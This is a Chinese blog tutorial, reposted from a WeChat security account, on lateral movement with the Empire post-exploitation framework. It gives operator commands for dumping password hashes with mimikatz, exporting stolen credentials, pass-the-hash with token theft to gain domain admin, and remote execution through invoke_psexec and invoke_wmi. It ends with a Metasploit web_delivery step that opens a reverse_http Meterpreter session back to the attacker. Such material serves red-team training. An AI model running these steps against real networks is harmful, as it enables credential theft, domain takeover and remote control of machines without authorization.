【Empire系列】横向移动相关

admin 2022年5月8日13:31:04评论47 views字数 1081阅读3分36秒阅读模式

转自:哈拉少安全小队

#001 获取密码hash


1、内置mimikatz

mimikatz    #执行会有点缓慢,执行成功即可抓取hash

【Empire系列】横向移动相关



2、creds命令:

creds

【Empire系列】横向移动相关


creds<空格>+<双击tab键> 可以看到扩展命令

【Empire系列】横向移动相关


当内网很复杂,hash很多时,可以通过export导出为csv文件

crds export /root/hash    #会自动添加文件后缀

【Empire系列】横向移动相关


结果如下:

【Empire系列】横向移动相关



#002 横向移动模块

1、令牌窃取配合hash传递:

①执行mimikatz后

creds    #列出所有Empire获取到的密码

【Empire系列】横向移动相关


②当发现列举出的creds中,有域高权限用户时,使用hash传递方式攻击:

pth

【Empire系列】横向移动相关


然后就能看见PID号,窃取该PID进程的令牌即可

steal_token

【Empire系列】横向移动相关

即可成功获取域管权限



2、横向移动常用模块:

①invoke-psexec:


usemodule lateral_movement/invoke_psexecset ComputerName <目标计算机名>set Listener <监听器名称>

【Empire系列】横向移动相关

成功会返回目标机器的agent会话



②invoke-wmi:


usemodule lateral_movement/invoke_wmiset ComputerName <目标计算机名>set Listener <监听器名称>

【Empire系列】横向移动相关

成功会返回目标机器的agent会话



③其他模块根据实际情况选用即可

usemodule lateral_movement/    #tab键列出模块

【Empire系列】横向移动相关




#003  转为MSF会话

Invoke-MetasploitPayload<-->web_delivery(MSF):

①MSF执行


use exploit/multi/script/web_deliveryset target 2set payload windows/meterpreter/reverse_httpset lhostset lpotr <监听端口>exploit

【Empire系列】横向移动相关



②Empire执行:


usemodule code_execution/invoke_metasploitpayloadset URLexecute

【Empire系列】横向移动相关


执行成功后,MSF会上线一个新的meterpreter会话

【Empire系列】横向移动相关


如侵权请私聊公众号删文


【Empire系列】横向移动相关

好文推荐

【Empire系列】横向移动相关

应急响应的基本流程(建议收藏)

渗透测试面试近期热门题

干货|安全工程师面试题汇总

渗透工程师常用命令速查手册

Web常见漏洞描述及修复建议

流量分析与日志溯源的个人理解

规范报告中的漏洞名称以及修复建议

应急响应 | 7款WebShell扫描检测查杀工具

11个步骤完美排查Linux机器是否已经被入侵


欢迎关注 系统安全运维

原文始发于微信公众号(系统安全运维):【Empire系列】横向移动相关

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月8日13:31:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Empire系列】横向移动相关https://cn-sec.com/archives/986175.html

发表评论

匿名网友 填写信息